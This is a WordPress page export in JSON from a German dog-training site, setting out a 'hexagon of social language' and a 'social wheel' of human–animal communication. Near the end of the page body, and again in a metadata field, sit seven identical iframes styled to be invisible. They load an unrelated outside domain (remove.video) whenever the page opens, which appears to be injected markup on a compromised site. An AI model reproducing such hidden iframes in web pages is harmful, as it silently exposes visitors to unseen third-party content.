{"id":4198,"date":"2021-04-15T18:33:26","date_gmt":"2021-04-15T16:33:26","guid":{"rendered":"http:\/\/www.hubert-asam.de\/?page_id=4198"},"modified":"2021-06-03T13:57:35","modified_gmt":"2021-06-03T11:57:35","slug":"schematische-darstellung","status":"publish","type":"page","link":"https:\/\/www.hubert-asam.de\/?page_id=4198","title":{"rendered":"Schematische Darstellung"},"content":{"rendered":"<p>[et_pb_section][et_pb_row][et_pb_column type=&#8220;1_3&#8243;][et_pb_image admin_label=&#8220;Bild&#8220; src=&#8220;http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/IMG_0180.jpg&#8220; show_in_lightbox=&#8220;off&#8220; url_new_window=&#8220;off&#8220; animation=&#8220;left&#8220; sticky=&#8220;off&#8220; align=&#8220;left&#8220; force_fullwidth=&#8220;off&#8220; always_center_on_mobile=&#8220;on&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220; \/][\/et_pb_column][et_pb_column type=&#8220;2_3&#8243;][et_pb_text admin_label=&#8220;Text&#8220; background_layout=&#8220;light&#8220; text_orientation=&#8220;left&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220;]<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><br \/>\n<\/a><br \/>\nDAS HEXAGON SOZIALER SPRACHE<\/h2>\n<p><strong>SCHEMATISCHE DARSTELLUNG SOZIALER SPRACHE<br \/>\n<\/strong><br \/>\nSoziale Sprache, tierische Kommunikation, \u00f6kologisch vernetzte Kommunikation, folgt einem Grundschema, in dem alles miteinander verbunden und vernetzt ist.<\/p>\n<p>Eine Handlung in diesem Schema wirkt sich ohne Zeitverz\u00f6gerung sofort auf alle anderen aus.<br \/>\nEine Handlung im \u00f6kologischen Netz muss an jeder Stelle, jeder Verbindung und in jeder Ebene permanent best\u00e4tigt werden, bis die Ordnung auch dann stabil bleibt, wenn innere oder \u00e4u\u00dfere Kr\u00e4fte an ihr wirken.<br \/>\nSie folgt\u00a0drei Verantwortungsebenen in Kombination mit drei Kommunikationsparametern.<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h2>\n<p>RAUM\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 =\u00a0 \u00a0 \u00a0 \u00a0 \u00a0Verantwortung<br \/>\nZEIT\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0=\u00a0 \u00a0 \u00a0 \u00a0 \u00a0Beziehung<br \/>\nBESITZ\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 =\u00a0 \u00a0 \u00a0 \u00a0 \u00a0Gemeinschaft<\/p>\n<p>KOMMANDO \u00a0 = \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Alleinverantwortung<br \/>\nSPIEL\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0= \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Parit\u00e4tische Verantwortung<br \/>\nFREILAUF\u00a0 \u00a0 \u00a0 \u00a0 =\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Allgemeinverantwortung<br \/>\n(ARBEIT\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 =\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00d6kologische Verantwortung) diese lassen wir aussen vor<strong><br \/>\n<\/strong><\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h2>\n<p>\u2022Soziale Sprache folgt \u00f6kologischen Grundprinzipien.<\/p>\n<p><strong>EINIGE \u00d6KOLOGISCHE PRINZIPIEN<br \/>\n<\/strong><br \/>\n\u2022 Das eine kann nicht ohne das andere kommuniziert werden<br \/>\n\u2022 Es gilt alles oder nichts, es gibt Ordnung und Unordnung, es gibt keine Kausalit\u00e4tskette<br \/>\n\u2022 Logische Verkn\u00fcpfungen sind nebens\u00e4chlich<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h2>\n<p>\u2022 Zeit ist nicht linear<br \/>\n\u2022 Getaktete Zeit ist nebens\u00e4chlich, es sind nat\u00fcrliche Rhythmen und Schwingungen, die wirken<br \/>\n\u2022 Beziehungs-Zeit beginnt, wenn man den anderen sp\u00fcrt und endet, wenn man ihn nicht mehr sp\u00fcrt<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h2>\n<p>\u2022 Themen, die nicht symptomatisch angesprochen sind, sind mit involviert, es lebt oder stirbt alles oder keiner<br \/>\n\u2022 Polarit\u00e4ten erzeugen die gleiche Wirkung (Gut\/B\u00f6se, Belohnung\/Bestrafung, Opfer\/T\u00e4ter)<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h2>\n<p>\u2022 Alles ist in allem enthalten<br \/>\n\u2022 Im Kleinsten ist das Gr\u00f6\u00dfte zu sehen<br \/>\n\u2022 Die Grundenergie wirkt \u00fcberall<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h2>\n<p>\u2022 Raum und Verantwortung, Zeit und Beziehung, Besitz und Gemeinschaft sind das gleiche<br \/>\n\u2022 Besitz ist nie f\u00fcr einen alleine<br \/>\n\u2022 Soziales \u00fcberschreibt Instinktives<br \/>\n\u2022 Links und Rechts sind zwei vollkommen verschiedene Angelegenheiten, denn sie sind mit der Vorstellung von unterschiedlichen pers\u00f6nlichen R\u00e4umen verbunden<br \/>\n\u2022 N\u00e4he und Distanz sind das selbe, sie sind mit der Vorstellung eines einzigen pers\u00f6nlichen Raumes verbunden<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h2>\n<p>\u2022 Aggression ist Kommunikation<br \/>\n\u2022 Es gibt keine Angst<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h2>\n<p>\u2022 Instinkte leiten ins Soziale<br \/>\n\u2022 Jedes Tun ist als soziale Frage aufzufassen, es ist nicht m\u00f6glich, nicht zu kommunizieren<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h2>\n<p>\u2022 Soziale Tiere wollen zueinander<br \/>\n\u2022 Neugier ist ein Trieb<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE.jpeg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-4200\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-300x212.jpeg\" alt=\"SOZIALE SPRACHE\" width=\"689\" height=\"486\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-300x212.jpeg 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-768x543.jpeg 768w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-1024x724.jpeg 1024w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-1080x764.jpeg 1080w\" sizes=\"(max-width: 689px) 100vw, 689px\" \/><\/a><\/p>\n<p>Realistisch und mehrdimensional wird dieses Schema dann, wenn man sich das \u201eSoziale Rad\u201c als lebendig rotierend vorstellt. An den Ankn\u00fcpfungspunkten entsteht eine Fliehkraft.<\/p>\n<p>Die regelm\u00e4\u00dfigen sozialen Ankn\u00fcpfungspunkte und deren Bande halten das Rad stabil.<\/p>\n<p>Sind einzelne Bande nicht fest genug oder zu starr, entsteht eine Unwucht, die \u201eSoziale Kommunikation\u201c ger\u00e4t in Unordnung, Nachrichten kommen nicht an den richtigen Stellen an oder werden nicht aufgenommen.<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h2>\n<p>Werden alle Bande gleicherma\u00dfen fest gekn\u00fcpft, bleibt das Rad lebendig und stabil.<br \/>\nBewegung und Ver\u00e4nderung sind ohne St\u00f6rung m\u00f6glich.<\/p>\n<p>Ver\u00e4nderungen k\u00f6nnen ausgehalten und\/oder eingef\u00fcgt werden.<br \/>\nIst die Beziehung zum Tier an allen Punkten gefestigt, ist gro\u00dfe Verhaltenssicherheit gegen\u00fcber allen inneren und \u00e4u\u00dferen Kr\u00e4ften da.<br \/>\nAuch komplexe Nachrichten k\u00f6nnen so ohne M\u00fche \u00fcber verschiedene Wege \u00fcbermittelt werden.<br \/>\nEinfache Dinge wie &#8222;Sitz&#8220; und &#8222;Platz&#8220; bekommen tiefe und vielseitige Bedeutungen, behalten aber immer die Kernaussage: \u201eWir geh\u00f6ren zusammen\u201c.<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h2>\n<p>Unsere Aufgabe besteht darin, ununterbrochen f\u00fcr Stabilit\u00e4t zu sorgen und ein Gesp\u00fcr daf\u00fcr zu entwickeln, wann etwas \u201eunrund\u201c wird.<br \/>\nAn welcher Stelle die \u201eUnwucht\u201c ausgel\u00f6st wird, ist nicht relevant.<br \/>\nEs m\u00fcssen jedes Mal alle Ankn\u00fcpfungspunkte \u00fcberpr\u00fcft werden.<\/p>\n<p>Nimmt jeder seinen ihm zugedachten Raum und seine Rolle ein, kann es nicht fehlschlagen, Natur ist perfekt vernetzt.<br \/>\nEine ununterbrochene \u00dcberpr\u00fcfung der sozialen Ordnung ist ebenso wichtig wie die \u00dcberpr\u00fcfung eines Rades und seiner Speichen an einem Fahrrad.<\/p>\n<p>Rotation und Bewegung bedeuten Lebendigkeit. Soziale Sprache ist nicht als Dogma oder starres abstraktes System zu sehen, es unterliegt Kr\u00e4ften, Schwankungen und Ver\u00e4nderungen und ist dennoch stabil.<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-Zentrifuge.jpeg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-4201\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-Zentrifuge-300x212.jpeg\" alt=\"SOZIALE SPRACHE Zentrifuge\" width=\"678\" height=\"479\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-Zentrifuge-300x212.jpeg 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-Zentrifuge-768x543.jpeg 768w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-Zentrifuge-1024x724.jpeg 1024w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-Zentrifuge-400x284.jpeg 400w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2021\/04\/SOZIALE-SPRACHE-Zentrifuge-1080x764.jpeg 1080w\" sizes=\"(max-width: 678px) 100vw, 678px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row][et_pb_column type=&#8220;4_4&#8243;][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p><div class=\"et_pb_section et_pb_section_0 et_section_regular\" >\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div><div class=\"et_pb_row et_pb_row_0 et_pb_row_empty\">\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div> DAS HEXAGON SOZIALER SPRACHE SCHEMATISCHE DARSTELLUNG SOZIALER SPRACHE Soziale Sprache, tierische Kommunikation, \u00f6kologisch vernetzte Kommunikation, folgt einem Grundschema, in dem alles miteinander verbunden und vernetzt ist. Eine Handlung in diesem Schema wirkt sich ohne Zeitverz\u00f6gerung sofort auf alle anderen aus. Eine Handlung im \u00f6kologischen Netz muss an jeder Stelle, jeder Verbindung und in jeder [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"<p>\u00a0<\/p><div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>","_et_gb_content_width":"","footnotes":""},"class_list":["post-4198","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/4198","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4198"}],"version-history":[{"count":9,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/4198\/revisions"}],"predecessor-version":[{"id":4227,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/4198\/revisions\/4227"}],"wp:attachment":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4198"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}